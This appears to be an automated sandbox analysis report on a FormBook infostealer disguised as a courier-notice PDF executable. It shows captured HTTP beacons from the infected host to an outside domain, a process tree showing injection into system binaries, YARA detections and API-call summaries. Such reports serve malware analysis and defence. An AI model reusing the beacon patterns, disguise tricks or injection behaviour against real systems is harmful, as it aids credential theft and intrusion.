Aug 6, 2024 08:00:23.512236118 CEST	1143	IN	HTTP/1.1 405 Not Allowed Date: Tue, 06 Aug 2024 06:00:23 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sfnRun8esQHGiza0r42%2BGMcig2P8jyofvDzQIqm71ApW0XYdt%2BapYQ5Mk0qmDsWIdfC4Tp270U%2BEKbvXPPk2UyXtI7TJULeuacItEZg53HBtWoczO5WCmIcn0NicROj5Gv9U93w%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8aecce6959487d0e-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 32 32 66 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED] Data Ascii: 22f<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.1</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.7	49766	104.21.17.191	80	6440	C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe

Timestamp	Bytes transferred	Direction	Data
Aug 6, 2024 08:00:25.398396015 CEST	538	OUT	GET /utgc/?wLTtn0=wywWfBrqEdu4Of0TGEXMpEnOank3eKh3frnML9uPnZ50Hwei4kKrO+8lS3f85dqDgJqwK6NjtdU1r4NauGv8+KUsgFrnvd2uJsLHZkaBWadbzfXU0G4TBiNKrnt/a6K4Cjqq35RngOKd&K4G=Thy4J4VXH8ud HTTP/1.1 Host: www.moodplay.store Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
Aug 6, 2024 08:00:26.044250011 CEST	1236	IN	HTTP/1.1 200 OK Date: Tue, 06 Aug 2024 06:00:25 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Last-Modified: Thu, 20 Jun 2024 01:09:54 GMT Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gp8GwoN%2Buy59QG52v7U7bAHOuw9sWJhljxOU2Ipn2W%2B6MS%2BxhFF2jEojplhvbefWMyxskCcQj%2Bz%2FeT%2F2lrxK7EHuXuaI3H%2BrogAwKtliANF6mtFy48D%2BR9qEmHFQWfvLpUl8IxE%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8aecce793a1d7cab-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 35 36 30 39 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 22 3e 0a 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 0a 09 09 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 2c 76 69 65 77 70 6f 72 74 2d 66 69 74 3d 63 6f 76 65 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 22 3e 0a 09 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 79 65 73 22 20 6e 61 6d 65 3d 22 61 70 70 6c 65 2d 6d 6f 62 69 6c 65 2d 77 65 62 2d 61 70 70 2d 63 61 70 61 [TRUNCATED] Data Ascii: 5609<html lang=""><head><meta charset="utf-8"><meta name="viewport"content="width=device-width,initial-scale=1,maximum-scale=1,minimum-scale=1,user-scalable=no,viewport-fit=cove" /><meta http-equiv="X-UA-Compatible" content="IE=edge"><link rel="icon" href="favicon.ico"><meta content="yes" name="apple-mobile-web-app-capable"><meta content="yes" name="apple-touch-fullscreen"><title>actionarena.top: Where happiness meets innovation \| Online Game \| Free Game</title><link href="css/chunk-common.2627b58b.css" rel="preload" as="style"><link href="css/chunk-vendors.df919
Aug 6, 2024 08:00:26.044270992 CEST	1236	IN	Data Raw: 39 37 35 2e 63 73 73 22 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 61 73 3d 22 73 74 79 6c 65 22 3e 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 63 73 73 2f 63 68 75 6e 6b 2d 76 65 6e 64 6f 72 73 2e 64 66 39 31 39 39 37 35 2e 63 73 73 22 20 72 65 Data Ascii: 975.css" rel="preload" as="style"><link href="css/chunk-vendors.df919975.css" rel="stylesheet"><link href="css/chunk-common.2627b58b.css" rel="stylesheet"><link href="css/index.c29d2c62.css" rel="stylesheet"><script src="gameData-new.
Aug 6, 2024 08:00:26.044286013 CEST	1236	IN	Data Raw: 65 6e 74 65 72 65 64 2c 20 62 6f 74 74 6f 6d 0a 09 09 09 62 75 74 74 6f 6e 3a 20 74 72 75 65 2c 0a 09 09 09 62 75 74 74 6f 6e 54 65 78 74 3a 20 22 50 72 69 76 61 63 79 20 73 65 74 74 69 6e 67 73 22 2c 0a 09 09 09 62 75 74 74 6f 6e 50 6f 73 69 74 Data Ascii: entered, bottombutton: true,buttonText: "Privacy settings",buttonPosition: "bottom-left" //bottom-left, bottom-right, bottom-center, top-left, top-right}aiptag.cmd.player.push(function() {aiptag.adplayer = new aipPlayer({
Aug 6, 2024 08:00:26.044296980 CEST	1236	IN	Data Raw: 63 6f 6e 74 65 6e 74 20 68 65 72 65 22 29 3b 0a 09 09 09 09 61 69 70 74 61 67 2e 61 64 70 6c 61 79 65 72 2e 61 69 70 43 6f 6e 66 69 67 2e 41 49 50 5f 43 4f 4d 50 4c 45 54 45 28 29 3b 0a 09 09 09 7d 0a 09 09 7d 0a 09 3c 2f 73 63 72 69 70 74 3e 0a Data Ascii: content here");aiptag.adplayer.aipConfig.AIP_COMPLETE();}}</script><script async src="//api.adinplay.com/libs/aiptag/pub/SMG/actionarena.top/tag.min.js"></script></head><body><div id="app"><div data-v-49759819="" class=
Aug 6, 2024 08:00:26.044310093 CEST	1236	IN	Data Raw: 20 31 2e 35 72 65 6d 3b 20 68 65 69 67 68 74 3a 20 31 2e 35 72 65 6d 3b 22 3e 0a 09 09 09 09 09 3c 73 70 61 6e 20 64 61 74 61 2d 76 2d 34 39 37 35 39 38 31 39 3d 22 22 20 63 6c 61 73 73 3d 22 69 74 65 6d 5f 6e 61 6d 65 22 3e 0a 09 09 09 09 09 09 Data Ascii: 1.5rem; height: 1.5rem;"><span data-v-49759819="" class="item_name">Girls</span></div></a><a data-v-49759819="" href="search.html?type=Puzzle" class="type_item"><div data-v-49759819=""><img data-v-49
Aug 6, 2024 08:00:26.044321060 CEST	1120	IN	Data Raw: 6d 22 3e 0a 09 09 09 09 3c 64 69 76 20 64 61 74 61 2d 76 2d 34 39 37 35 39 38 31 39 3d 22 22 3e 0a 09 09 09 09 09 3c 69 6d 67 20 64 61 74 61 2d 76 2d 34 39 37 35 39 38 31 39 3d 22 22 20 61 6c 74 3d 22 22 20 73 72 63 3d 22 69 6d 67 2f 6b 69 64 73 Data Ascii: m"><div data-v-49759819=""><img data-v-49759819="" alt="" src="img/kids.a5414faa.png" data-src="img/kids.a5414faa.png"style="width: 1.5rem; height: 1.5rem;"><span data-v-49759819="" class="item_name">Kids</
Aug 6, 2024 08:00:26.044332027 CEST	1236	IN	Data Raw: 6e 2e 36 62 39 35 61 35 66 66 2e 70 6e 67 22 20 64 61 74 61 2d 73 72 63 3d 22 69 6d 67 2f 61 63 74 69 6f 6e 2e 36 62 39 35 61 35 66 66 2e 70 6e 67 22 0a 09 09 09 09 09 09 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 20 31 2e 35 72 65 6d 3b 20 68 65 69 Data Ascii: n.6b95a5ff.png" data-src="img/action.6b95a5ff.png"style="width: 1.5rem; height: 1.5rem;"><span data-v-49759819="" class="item_name">Action</span></div></a><a data-v-49759819="" href="search.html?type=Clas
Aug 6, 2024 08:00:26.044348001 CEST	1236	IN	Data Raw: 22 31 2e 38 72 65 6d 22 20 68 65 69 67 68 74 3d 22 31 2e 38 72 65 6d 22 20 63 6c 61 73 73 3d 22 69 63 6f 6e 22 3e 0a 09 09 09 09 09 09 3c 70 61 74 68 20 64 61 74 61 2d 76 2d 34 39 37 35 39 38 31 39 3d 22 22 0a 09 09 09 09 09 09 09 64 3d 22 4d 36 Data Ascii: "1.8rem" height="1.8rem" class="icon"><path data-v-49759819=""d="M672.757869 550.62896H195.293694c-21.181973 0-38.373139-17.191166-38.373138-38.373139s17.191166-38.373139 38.373138-38.373139h477.464175c21.181973 0 38.373139 17.1
Aug 6, 2024 08:00:26.044359922 CEST	1236	IN	Data Raw: 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 20 77 69 64 74 68 3d 22 31 2e 35 72 65 6d 22 20 68 65 69 67 68 74 3d 22 31 2e 35 72 65 6d 22 20 63 6c 61 73 73 3d 22 69 63 6f 6e 22 3e 0a 09 09 09 Data Ascii: nk="http://www.w3.org/1999/xlink" width="1.5rem" height="1.5rem" class="icon"><path data-v-49759819=""d="M941.6 874L763.7 696.1c20.6-26.7 37.6-55.9 50.8-87.2 20.3-48.3 30.6-99.6 30.6-152.4s-10.3-104.1-30.6-152.4c-19.6-46.6-47.7-
Aug 6, 2024 08:00:26.044372082 CEST	1236	IN	Data Raw: 69 64 3d 22 31 35 38 32 37 22 20 77 69 64 74 68 3d 22 32 72 65 6d 22 20 68 65 69 67 68 74 3d 22 32 72 65 6d 22 20 63 6c 61 73 73 3d 22 69 63 6f 6e 22 3e 0a 09 09 09 09 09 09 3c 70 61 74 68 20 64 61 74 61 2d 76 2d 30 35 34 34 37 39 33 66 3d 22 22 Data Ascii: id="15827" width="2rem" height="2rem" class="icon"><path data-v-0544793f=""d="M606.72 668.949333l62.144-62.144 248.298667 248.298667-62.144 62.144z" fill="#607D8B"p-id="15828"></path><path data-v-0544793f="
Aug 6, 2024 08:00:26.049220085 CEST	1236	IN	Data Raw: 69 76 20 63 6c 61 73 73 3d 22 74 6f 70 5f 67 61 6d 65 5f 31 22 3e 0a 09 09 09 09 09 09 09 3c 64 69 76 20 64 61 74 61 2d 76 2d 35 37 37 36 63 37 65 63 3d 22 22 20 64 61 74 61 2d 76 2d 35 39 32 34 36 33 36 61 3d 22 22 20 63 6c 61 73 73 3d 22 74 69 Data Ascii: iv class="top_game_1"><div data-v-5776c7ec="" data-v-5924636a="" class="title_index"><div data-v-9f35d832="" data-v-5776c7ec="" class="default_title"><div data-v-9f35d832="" class="title"><span data-v-9f35

Target ID:	0
Start time:	01:56:19
Start date:	06/08/2024
Path:	C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe"
Imagebase:	0x8c0000
File size:	1'262'592 bytes
MD5 hash:	430EABD3F3BC703CD6D9A25A815258CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	01:56:20
Start date:	06/08/2024
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe"
Imagebase:	0x8f0000
File size:	46'504 bytes
MD5 hash:	1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1574766006.0000000008750000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1574766006.0000000008750000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1563175815.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1563175815.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1564791903.0000000003590000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1564791903.0000000003590000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	01:56:31
Start date:	06/08/2024
Path:	C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe"
Imagebase:	0xb30000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3831474979.00000000032E0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.3831474979.00000000032E0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	01:56:34
Start date:	06/08/2024
Path:	C:\Windows\SysWOW64\getmac.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\getmac.exe"
Imagebase:	0x470000
File size:	65'024 bytes
MD5 hash:	31874C37626D02373768F72A64E76214
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3831474981.0000000004D70000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.3831474981.0000000004D70000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3829546280.0000000003470000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.3829546280.0000000003470000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3819445354.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.3819445354.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	01:56:47
Start date:	06/08/2024
Path:	C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe"
Imagebase:	0xb30000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3833798452.00000000053B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3833798452.00000000053B0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	01:56:59
Start date:	06/08/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x7ff722870000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	3%
Dynamic/Decrypted Code Coverage:	20.9%
Signature Coverage:	3.1%
Total number of Nodes:	1887
Total number of Limit Nodes:	53

Executed Functions

Function 008C42DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 008C430D

Part of subcall function 008C6B57: _wcslen.LIBCMT ref: 008C6B6A

GetCurrentProcess.KERNEL32(?,0095CB64,00000000,?,?), ref: 008C4422
IsWow64Process.KERNEL32(00000000,?,?), ref: 008C4429
LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 008C4454
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 008C4466
GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 008C4474
FreeLibrary.KERNEL32(00000000,?,?), ref: 008C447B
GetSystemInfo.KERNEL32(?,?,?), ref: 008C44A0

Strings

GetNativeSystemInfo, xrefs: 008C4460
kernel32.dll, xrefs: 008C444F
|O, xrefs: 009036F8

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
String ID: GetNativeSystemInfo$kernel32.dll$|O
API String ID: 3290436268-3101561225
Opcode ID: c43442147eb7a3375565fa4d95080c97543bf4e0d640177205fdfd1e939873c6
Instruction ID: 44be1b2ed40a51c9a8aeffce9c1b990057ea18a3b8eb50b57bd375ec8caa1471
Opcode Fuzzy Hash: c43442147eb7a3375565fa4d95080c97543bf4e0d640177205fdfd1e939873c6
Instruction Fuzzy Hash: 40A1F36593E3C2DFC716C77D7C436A53FB8BB26304B18989FE84193A61D2328548EB25

Function 008C42A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,008C50AA,?,?,00000000,00000000), ref: 008C42B2
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,008C50AA,?,?,00000000,00000000), ref: 008C42C9
LoadResource.KERNEL32(?,00000000,?,?,008C50AA,?,?,00000000,00000000,?,?,?,?,?,?,008C4F20), ref: 009035BE
SizeofResource.KERNEL32(?,00000000,?,?,008C50AA,?,?,00000000,00000000,?,?,?,?,?,?,008C4F20), ref: 009035D3
LockResource.KERNEL32(008C50AA,?,?,008C50AA,?,?,00000000,00000000,?,?,?,?,?,?,008C4F20,?), ref: 009035E6

Strings

SCRIPT, xrefs: 008C42BF

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: 344753b66e8a87fd3159045d6014d7d61846c03520b9e04515e4b4f12e28cb0a
Instruction ID: ff91b8c600c8d49a231d47cb1b584e3052ff15943ad892eab9485f14571928bc
Opcode Fuzzy Hash: 344753b66e8a87fd3159045d6014d7d61846c03520b9e04515e4b4f12e28cb0a
Instruction Fuzzy Hash: D2115AB0200701AFD7218B66DC49F277BB9EBC5B52F20816DF816D62A0DBB2D840E620

Function 00902BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetCurrentDirectoryW.KERNEL32(?), ref: 008C2B6B

Part of subcall function 008C3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00991418,?,008C2E7F,?,?,?,00000000), ref: 008C3A78

Part of subcall function 008C9CB3: _wcslen.LIBCMT ref: 008C9CBD

GetForegroundWindow.USER32(runas,?,?,?,?,?,00982224), ref: 00902C10
ShellExecuteW.SHELL32(00000000,?,?,00982224), ref: 00902C17

Strings

runas, xrefs: 00902C0B

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
String ID: runas
API String ID: 448630720-4000483414
Opcode ID: ba64ed36339519891391b889404bcab94b4935dfb68731932e3ac9e5c197d15a
Instruction ID: bc9df90b1ec03a40e3370370e2e72495e25400daf69753daf7ebf81e0dd9964c
Opcode Fuzzy Hash: ba64ed36339519891391b889404bcab94b4935dfb68731932e3ac9e5c197d15a
Instruction Fuzzy Hash: 40119D31208345AACB14FF68E855FBEBBB4FB95311F44442DF082921A2CF31CA4A9713

Function 0092DBBE Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,00905222), ref: 0092DBCE
GetFileAttributesW.KERNELBASE(?), ref: 0092DBDD
FindFirstFileW.KERNELBASE(?,?), ref: 0092DBEE
FindClose.KERNEL32(00000000), ref: 0092DBFA

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: FileFind$AttributesCloseFirstlstrlen
String ID:
API String ID: 2695905019-0
Opcode ID: 2606c498f5ed318b718c4744d9b736e77ef6b57efe57b026e12c1936fad72f0a
Instruction ID: 76e67c4a4a9246a9d7895d76e60be81d4a2fc1a16fa4ab22179893e0c7886333
Opcode Fuzzy Hash: 2606c498f5ed318b718c4744d9b736e77ef6b57efe57b026e12c1936fad72f0a
Instruction Fuzzy Hash: 7EF0A07082AB205B8220AB78AC0D8AA376C9E01336B104702F8B6D20E0EBB09954D6D6

Function 008CD730 Relevance: 21.6, APIs: 14, Instructions: 625windowsleeptimeCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 008CD807
timeGetTime.WINMM ref: 008CDA07
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 008CDB28
TranslateMessage.USER32(?), ref: 008CDB7B
DispatchMessageW.USER32(?), ref: 008CDB89
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 008CDB9F
Sleep.KERNEL32(0000000A), ref: 008CDBB1

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
String ID:
API String ID: 2189390790-0
Opcode ID: 7dfd7857096e971a4a499de4accb057445c81c83c3ded52d0afaa86106220173
Instruction ID: 8779887bd5d4f221a5d467981930090a2300420d13734caf77eed34f73604ca2
Opcode Fuzzy Hash: 7dfd7857096e971a4a499de4accb057445c81c83c3ded52d0afaa86106220173
Instruction Fuzzy Hash: BD42DF70608345AFD728EB28C844FAABBF4FF85314F14856EE596C7291D770E894DB82

